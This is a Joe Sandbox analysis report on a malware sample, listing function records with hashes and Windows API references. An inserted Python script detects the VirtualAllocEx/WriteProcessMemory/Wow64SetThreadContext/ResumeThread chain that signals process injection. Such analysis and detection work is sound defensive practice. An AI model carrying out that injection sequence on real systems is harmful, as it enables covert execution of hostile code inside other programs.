                          • Instruction Fuzzy Hash: C241D1B1C00729CBDB24DFA9C8847CDBBB2BF49714F20856AD408AB251DB756946CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq
                          • API String ID: 0-1594803414
                          • Opcode ID: 88c60ad36c161c35913430c158f877b27342ad06703c1d297839b1b378dbf504
                          • Instruction ID: 93be35d340707bb05db8652f931274b14a4bf143db8fbad2ed6a62453b09441c
                          • Opcode Fuzzy Hash: 88c60ad36c161c35913430c158f877b27342ad06703c1d297839b1b378dbf504
                          • Instruction Fuzzy Hash: 9FD1BD70B00205CFDB14DF69D485AAEBBF2AF88341F14856AE449EB355DB34DD46CBA0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: &
                          • API String ID: 0-1010288
                          • Opcode ID: 850cb37a98560eb329cac0ac0c05ee8aab364d831b8adecbc5fea4e1ca861390
                          • Instruction ID: 23e35fa65863eef552986329acc7879cafd47934ad32dedfa6e01514e4fbd732
                          • Opcode Fuzzy Hash: 850cb37a98560eb329cac0ac0c05ee8aab364d831b8adecbc5fea4e1ca861390
                          • Instruction Fuzzy Hash: B3C1C0B5B343029FCB189F71A55453ABBA2BFC52407598A99D84B8B385DF34FC02C791
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EED178
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 493b57542b29d25137da60f7c54dc124c78bb61996979d5f6193fe8b7d6446f9
                          • Instruction ID: f7e7ca8776627078af8ad5464ef9913cbecb9706769b3eef5803c89dea617263
                          • Opcode Fuzzy Hash: 493b57542b29d25137da60f7c54dc124c78bb61996979d5f6193fe8b7d6446f9
                          • Instruction Fuzzy Hash: 9B2124759003499FDB10DFA9C881BEEBBF1FF48320F108529E959A7250C7789945CB60
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EECB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: a22334a2c96c5d6730f804762d1169d34cdafdfbb1eed36f1c3c56f8e493cea4
                          • Instruction ID: 9455acaa554202d450b58693a00870d445a92dd95999ce5e2aa00928bd764500
                          • Opcode Fuzzy Hash: a22334a2c96c5d6730f804762d1169d34cdafdfbb1eed36f1c3c56f8e493cea4
                          • Instruction Fuzzy Hash: 2D216971D043498FDB20CFA9C4857EEBFF0AF49210F14842ED459A7281CB789A45CF61
                          APIs
                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EED178
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 5762a49dd215d8fc98445ad2b3bd32187263d482c64df96e4d619c1d220a7cc9
                          • Instruction ID: f1e17c3552012865ea4fd930a4218c363a45b6eb0cd82a7dfeb929f0b1fd0bb1
                          • Opcode Fuzzy Hash: 5762a49dd215d8fc98445ad2b3bd32187263d482c64df96e4d619c1d220a7cc9
                          • Instruction Fuzzy Hash: 54213975D003099FDB10DFA9C881BDEBBF5FF48310F508429E919A7250C7799951CBA4
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0592A277
                          Memory Dump Source
                          • Source File: 00000000.00000002.1322384622.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5920000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 3a4fda58cf5858215d42cf14340f7f3358d23c045c8dc3729d255028c2f585cf
                          • Instruction ID: 953106d3c78d134d3aad859264127cb30cee302756488d8299aff5b7b5d768c1
                          • Opcode Fuzzy Hash: 3a4fda58cf5858215d42cf14340f7f3358d23c045c8dc3729d255028c2f585cf
                          • Instruction Fuzzy Hash: AE31E0B6D003499FDB10CF9AD880A9EBBF4FF48220F14842AE919A7210D775A945CFA0
                          APIs
                          • DrawTextExW.USER32(?,?,?,?,?,?), ref: 0592A277
                          Memory Dump Source
                          • Source File: 00000000.00000002.1322384622.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5920000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DrawText
                          • String ID:
                          • API String ID: 2175133113-0
                          • Opcode ID: 7fe660577c2e3ced35129a787eb5fa24d05fef772745b6d98aea1d265d1414e0
                          • Instruction ID: 369a82fb4f7745fc70a27ffc663f74fed2f4b69cf94a26c855f148edda3c5a1f
                          • Opcode Fuzzy Hash: 7fe660577c2e3ced35129a787eb5fa24d05fef772745b6d98aea1d265d1414e0
                          • Instruction Fuzzy Hash: E321C0B5D003099FDB10CF9AD884A9EFBF9FB48320F14842AE919A7210D775A945CFA0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313D8CE,?,?,?,?,?), ref: 0313D98F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 8da9ccc400e42f7c8d2b07c9ff91874723c90954175c69c77b53344db7bceead
                          • Instruction ID: a5a5e0a0efb1b916e1c0146d3448be30afea1982f7d0cabf73f3845a5d8edf85
                          • Opcode Fuzzy Hash: 8da9ccc400e42f7c8d2b07c9ff91874723c90954175c69c77b53344db7bceead
                          • Instruction Fuzzy Hash: D02105B5D002099FDB10CFAAE984ADEFBF9FB49320F14801AE914A3310D374A940CFA5
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EED258
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: ebb3f0aca15b9449752ae58badeabbad8ec0c0c057ee19faa27beeb94652090c
                          • Instruction ID: cdc8040dcd392fc03254d53a45b10e8dc8c9591312a1f28c388710bfebf69033
                          • Opcode Fuzzy Hash: ebb3f0aca15b9449752ae58badeabbad8ec0c0c057ee19faa27beeb94652090c
                          • Instruction Fuzzy Hash: FC211671D003499FDB10DFAAC881BEEBBF1FF48310F54852AE959A7250CB399941CBA0
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313D8CE,?,?,?,?,?), ref: 0313D98F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • String ID:
                          • API String ID: 3793708945-0
                          • Opcode ID: 36a8ed5ceb332065135a6f4763da66db61fb1e0a8dc5f2f53fed07fd007f8416
                          • Instruction ID: 5c1e227b2db2fb76cf3b3d63f508d4408fc221b3de367a052346dd4b36f72ebf
                          • Opcode Fuzzy Hash: 36a8ed5ceb332065135a6f4763da66db61fb1e0a8dc5f2f53fed07fd007f8416
                          • Instruction Fuzzy Hash: 3C21F2B59002089FDB10CF9AD884AEEBBF4FB48310F14841AE914A3210D774A940CFA1
                          APIs
                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EECB96
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ContextThreadWow64
                          • String ID:
                          • API String ID: 983334009-0
                          • Opcode ID: 2af9faf9a8b16fdcf96696427f679baf189ad8f670e8d2bfd3d80694471c08be
                          • Instruction ID: 5fe272cc7b493b41799743d18c5caa2d056c2d9de2fe2a660b57342ed2599361
                          • Opcode Fuzzy Hash: 2af9faf9a8b16fdcf96696427f679baf189ad8f670e8d2bfd3d80694471c08be
                          • Instruction Fuzzy Hash: 6D213871D003098FDB20DFAAC485BAEBBF4EF48314F54842DD459A7240CB789945CFA4
                          APIs
                          • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 08EED258
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
                          • Opcode ID: 27fea1a6f443a50aa1560158e68f7449266517560400141858b22868596270a9
                          • Instruction ID: 7c8f92cc2080ec72c83de6daae0a6c01cee40a50c8c8f7771ae278bf12ad677e
                          • Opcode Fuzzy Hash: 27fea1a6f443a50aa1560158e68f7449266517560400141858b22868596270a9
                          • Instruction Fuzzy Hash: 2B21F571D003499FDB10DFAAC881BEEBBF5FF48310F50842AE919A7250DB799941CBA5
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EED096
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 64aa55ce5b77ee97a513a125c4268e97e3bb3c065256c4d5b24fa394619fcb61
                          • Instruction ID: 2e3cb09dda33ba1208e5a5adc68522006465106a98c0ed7856963c634ae3e8b5
                          • Opcode Fuzzy Hash: 64aa55ce5b77ee97a513a125c4268e97e3bb3c065256c4d5b24fa394619fcb61
                          • Instruction Fuzzy Hash: A2114472D003499FDB20DFAAC845BEEBBF5EB49320F14841AE515A7250CB769941CBA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: d8f55a3de81026bbbfab7c79437ce95b39b1c255a6238bae99e6264c6a54b695
                          • Instruction ID: fd3435b471243b69636d3538170bbf4423693f791d0f8e89c1fad85be17de5c0
                          • Opcode Fuzzy Hash: d8f55a3de81026bbbfab7c79437ce95b39b1c255a6238bae99e6264c6a54b695
                          • Instruction Fuzzy Hash: E4114971D003498FDB20DFAAC445BAEBFF4AB48224F24841DD41AA7250CB759541CFA4
                          APIs
                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EED096
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: a8f6c1fead2a0b38c5abcfafeed042cfe046655d2770f800948cf0beb9c8a743
                          • Instruction ID: fdfc67b0ed13722d1a6a610574f835845a0a0b4157fd2db9d0efd317d58dd134
                          • Opcode Fuzzy Hash: a8f6c1fead2a0b38c5abcfafeed042cfe046655d2770f800948cf0beb9c8a743
                          • Instruction Fuzzy Hash: 62113776D003499FDB20DFAAC845BDEBBF5EF48320F148419E515A7250CB769941CFA4
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 08F9162D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1328326436.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8f90000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 7563c21e8094b742aef0d597b53d744aedbba958a2b862e1129609816356ebd5
                          • Instruction ID: 9c28655ade2b0bda351083ea0b96aa3a02cb940cf8bc61f3aa44cc824589d733
                          • Opcode Fuzzy Hash: 7563c21e8094b742aef0d597b53d744aedbba958a2b862e1129609816356ebd5
                          • Instruction Fuzzy Hash: 981185B5C043898FDB21CFAAD885BDEBFF4EB49320F14845AD454A7251C378A984CFA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1327094873.0000000008EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8ee0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: a37c6de3beaa621ef471d580c797a926eb2e9da7a284283e320422d8c6d8f864
                          • Instruction ID: 07ae3f9fd579c232d487184b1ec11fe4f982923e55588a57615ba6a48cef3ca3
                          • Opcode Fuzzy Hash: a37c6de3beaa621ef471d580c797a926eb2e9da7a284283e320422d8c6d8f864
                          • Instruction Fuzzy Hash: 1D110671D003498FDB24DFAAC445BAEFBF5EB88324F248419D51AA7240CB79A945CFA4
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0313B67E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1314368753.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3130000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 6fe4e3bd9f0cc643c75f76282e2372b4d79f440fbdaa36cfc08f2be043b76341
                          • Instruction ID: 6b659cb20f820e3bb102fa4da63f7f6f7fa43789c2aeb3bba9e33b9aaea3325b
                          • Opcode Fuzzy Hash: 6fe4e3bd9f0cc643c75f76282e2372b4d79f440fbdaa36cfc08f2be043b76341
                          • Instruction Fuzzy Hash: 581110B5C007498FCB20CF9AC444BDEFBF4EB88320F14842AD429A7210D379A545CFA1
                          APIs
                          • PostMessageW.USER32(?,?,?,?), ref: 08F9162D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1328326436.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8f90000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 65865fadd27b9989d604865f5592b01a524f7dea68060ad2e8210a58919b271c
                          • Instruction ID: 963e4ebd4e382a332071380e17b20dec0aa393a084b94f7d965546fd7177594d
                          • Opcode Fuzzy Hash: 65865fadd27b9989d604865f5592b01a524f7dea68060ad2e8210a58919b271c
                          • Instruction Fuzzy Hash: C01103B5C003499FDB20DF9AD885BDEBBF8EB48320F108419D558A3240D379A984CFA1
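Read together, the "APIs" records above for the 08EE0000 dump region tie one set of functions to VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread, the allocate/write/redirect-thread/resume sequence used to run a payload inside another process, while the report lists them one function at a time and prints no call line at all for the two ResumeThread records. The script below is an added example, not code from the Joe Sandbox report or from the sample: it parses records in this layout, groups the referenced APIs by dump region, and reports which regions carry the complete chain. SAMPLE_RECORDS is a constructed, abbreviated excerpt of records visible on this page, and INJECTION_CHAIN is this example's own heuristic rather than a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function "APIs" records and flag, per memory-dump
region, the API set that makes up remote process injection.

Added example, not code from the Joe Sandbox report or from the sample.
SAMPLE_RECORDS is a constructed, abbreviated excerpt of records visible on
this page; INJECTION_CHAIN is this example's own heuristic, not a Joe
Sandbox signature.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt: the "Memory Dump Source"/"Similarity"/hash lines the
# parser ignores are left out and the .sdmp file names are shortened.
SAMPLE_RECORDS = """\
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08EECB96
• Source File: ...8EE0000...sdmp, Offset: 08EE0000, based on PE: false
• API ID: ContextThreadWow64
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 08EED178
• Source File: ...8EE0000...sdmp, Offset: 08EE0000, based on PE: false
• API ID: MemoryProcessWrite
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08EED096
• Source File: ...8EE0000...sdmp, Offset: 08EE0000, based on PE: false
• API ID: AllocVirtual
APIs
• Source File: ...8EE0000...sdmp, Offset: 08EE0000, based on PE: false
• API ID: ResumeThread
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0313D8CE,?,?,?,?,?), ref: 0313D98F
• Source File: ...3130000...sdmp, Offset: 03130000, based on PE: false
• API ID: DuplicateHandle
Strings
• Source File: ...76F0000...sdmp, Offset: 076F0000, based on PE: false
• API ID:
• String ID: Hq
"""

CALL_RE = re.compile(r"^•\s*(\w+)\.([\w.]+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(\S*)$")
# Heuristic: a function set referencing all four is the classic
# allocate/write/redirect-thread/resume injection primitive.
INJECTION_CHAIN = {"VirtualAllocEx", "WriteProcessMemory",
                   "Wow64SetThreadContext", "ResumeThread"}


@dataclass
class FunctionRecord:
    kind: str                 # "APIs" or "Strings"
    offset: str = ""          # dump base, e.g. "08EE0000"
    api_id: str = ""          # Joe's token form, e.g. "AllocVirtual"
    calls: list = field(default_factory=list)  # (api, module, ref)


def parse_records(text):
    """One FunctionRecord per 'APIs'/'Strings' header; other lines are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            current = FunctionRecord(kind=line)
            records.append(current)
        elif current is None:
            continue
        elif (m := CALL_RE.match(line)):
            current.calls.append((m[1], m[2], m[4]))
        elif line.startswith("• Source File") and (m := OFFSET_RE.search(line)):
            current.offset = m[1].upper()
        elif (m := APIID_RE.match(line)):
            current.api_id = m[1]
    return records


def apis_in_record(rec):
    """API names of a record. Where the report prints no call line (the
    ResumeThread records on this page) fall back to the API ID, but only
    when it is a plain API name rather than Joe's token form."""
    names = {api for api, _, _ in rec.calls}
    if not names and rec.api_id in INJECTION_CHAIN:
        names.add(rec.api_id)
    return names


def apis_by_region(records):
    """Map dump-region base address to the union of APIs its functions reference."""
    by_region = defaultdict(set)
    for rec in records:
        if rec.kind == "APIs" and rec.offset:
            by_region[rec.offset] |= apis_in_record(rec)
    return dict(by_region)


def injection_regions(by_region, chain=INJECTION_CHAIN):
    """Dump regions whose functions together reference every API in chain."""
    return sorted(off for off, apis in by_region.items() if chain <= apis)


def missing_from_chain(by_region, offset, chain=INJECTION_CHAIN):
    """Chain members a region does not reference (empty when the chain is complete)."""
    return sorted(chain - by_region.get(offset, set()))
```

Run against the constructed excerpt, `injection_regions` returns only `08EE0000`, and `missing_from_chain` for `03130000` lists all four chain members, which is the point of grouping by region rather than by record: no single record on the page names more than one API. The fallback in `apis_in_record` is deliberately narrow because the API ID field is Joe Sandbox's own token form (`AllocVirtual` for VirtualAllocEx, `MemoryProcessWrite` for WriteProcessMemory) and only happens to equal the API name for ResumeThread.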
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hq
                          • API String ID: 0-1594803414
                          • Opcode ID: 0b83ff4170a048e448e12d8a82fda956be27d4fdd91897fba809c354386d5e17
                          • Instruction ID: 810d78d420a03905e91877c2f39efddfd2cc17df833c0dc9042d5d9edfd80ff1
                          • Opcode Fuzzy Hash: 0b83ff4170a048e448e12d8a82fda956be27d4fdd91897fba809c354386d5e17
                          • Instruction Fuzzy Hash: D5A1AE70A003059FDB15DF68C484A9ABBF2FF89300B6485ADD55A8F362CB31ED46CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,q
                          • API String ID: 0-196045463
                          • Opcode ID: 1e1da6282f898097bc26df6c54d5ebef01959e5b36a58649a0db6de077a9d38e
                          • Instruction ID: 3da5f1a05810530a33117641af6751e14c66203e2e1f666bc9ea828ee0d7c0ea
                          • Opcode Fuzzy Hash: 1e1da6282f898097bc26df6c54d5ebef01959e5b36a58649a0db6de077a9d38e
                          • Instruction Fuzzy Hash: 1E71BAB0F31206CFEB259A36C85567977E66FCA141F294066D947CB7A2EE30CC138792
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: a8833ec09fa03abe6f6b0244de6a33a9357d5eea16df4cdb98ece5b7a9bdfd71
                          • Instruction ID: 7d2a2ba398ff72d2d47b0fedba519d06d8a64872a45ee2e7b1604b914452e99e
                          • Opcode Fuzzy Hash: a8833ec09fa03abe6f6b0244de6a33a9357d5eea16df4cdb98ece5b7a9bdfd71
                          • Instruction Fuzzy Hash: 34519171A00219DFDB55CFA8C884AAEBBF5FF48341F148169EA05EB251D730ED56CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: 6fbcbca7131cb0fdb5bfd2dfa26161dc4e94abbc8e4f6f9c3ec7561ea8439c25
                          • Instruction ID: a52d053314b04ed56a1ea997f808b56d5e6608acbae39173c564b1857b1d4259
                          • Opcode Fuzzy Hash: 6fbcbca7131cb0fdb5bfd2dfa26161dc4e94abbc8e4f6f9c3ec7561ea8439c25
                          • Instruction Fuzzy Hash: 9C519EB5A00306DFD705DF68C48499ABBF2FF89310B5586A9D4499B326DB30ED46CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 7
                          • API String ID: 0-1790921346
                          • Opcode ID: 0b759fc75a2ebfb66d39a2f8a4f54d751688330405522b07559266ff5df10e3d
                          • Instruction ID: e983f731c205f711897057169ced86a5cc996edd2817115a7f57beff14da8379
                          • Opcode Fuzzy Hash: 0b759fc75a2ebfb66d39a2f8a4f54d751688330405522b07559266ff5df10e3d
                          • Instruction Fuzzy Hash: B6415BB4B10301CFD724DF35C444A6AB7B6EF89310B19C5AAE44A8B366DB31EC46CB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'q
                          • API String ID: 0-1807707664
                          • Opcode ID: e18277e015c2a8ccc3c28b323f37058aa60a44fc27c75d78de013bacc9bea0d4
                          • Instruction ID: e1837cb5efa372f7a01912060f9f524146f314ca317c3b4679509e483f133d05
                          • Opcode Fuzzy Hash: e18277e015c2a8ccc3c28b323f37058aa60a44fc27c75d78de013bacc9bea0d4
                          • Instruction Fuzzy Hash: C3516EB4A00316DFD715DF68C48499EBBF2FF89310B1586A9D4499B326DB30ED46CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326232564.00000000076F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76f0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: `]q
                          • API String ID: 0-1338170527
                          • Opcode ID: e3c8143a92355f5da7b531eb67fdec9426e3d89ef657ac010543cab9eb7f716a
                          • Instruction ID: 5f2eda277aece6b4e27ae8572d4b0cb9af2f448fb2f1679167c7dd0b9036254a
                          • Opcode Fuzzy Hash: e3c8143a92355f5da7b531eb67fdec9426e3d89ef657ac010543cab9eb7f716a
                          • Instruction Fuzzy Hash: 18418EB1701616CFCB14DF69D984A2ABBF5EF89311B1580E9DA0ACB761DB30DC41CB61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: U
                          • API String ID: 0-3372436214
                          • Opcode ID: 87d0876d2c0481da04aef006b13519e5bd5040b0cc0c6ca912e95566c3898412
                          • Instruction ID: 2e18b1e1df96988edfcabdb6955569b7733de1215f9d8b88e5ec7fa0ba82596f
                          • Opcode Fuzzy Hash: 87d0876d2c0481da04aef006b13519e5bd5040b0cc0c6ca912e95566c3898412
                          • Instruction Fuzzy Hash: 84318134A10205CFCB10DF65D498A6EBBF2FF88315B14C669E45A8B391CB34E945DB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326121448.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_76d0000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: V
                          • API String ID: 0-1342839628
                          • Opcode ID: ca117951c213885f496a31cf6db119ce97126e262b741e38e04d295ff65ceca1
                          • Instruction ID: e9dfb823d98568926948ee30950b446ebb8805bf1404e480a6b90cb7389b8b96
                          • Opcode Fuzzy Hash: ca117951c213885f496a31cf6db119ce97126e262b741e38e04d295ff65ceca1
                          • Instruction Fuzzy Hash: E121AFB4B10246AFCB059F74DC149AFBBB2FF88201F00456AE95697381DB349D11CBA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1326753318.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8d40000_vQyKfYxzXB.jbxd
                          Similarity
                          • API ID:
                          • String ID: V
                          • API String ID: 0-1342839628
                          • Opcode ID: 6d5df2fb48fec92543cf7965fa5cdeb97572b5b504670d0e71ef7ddefce750a8
                          • Instruction ID: 9c66169d6e804d2ea25323406170b0570787ce5a464ddc489e04158b657007c4
                          • Opcode Fuzzy Hash: 6d5df2fb48fec92543cf7965fa5cdeb97572b5b504670d0e71ef7ddefce750a8
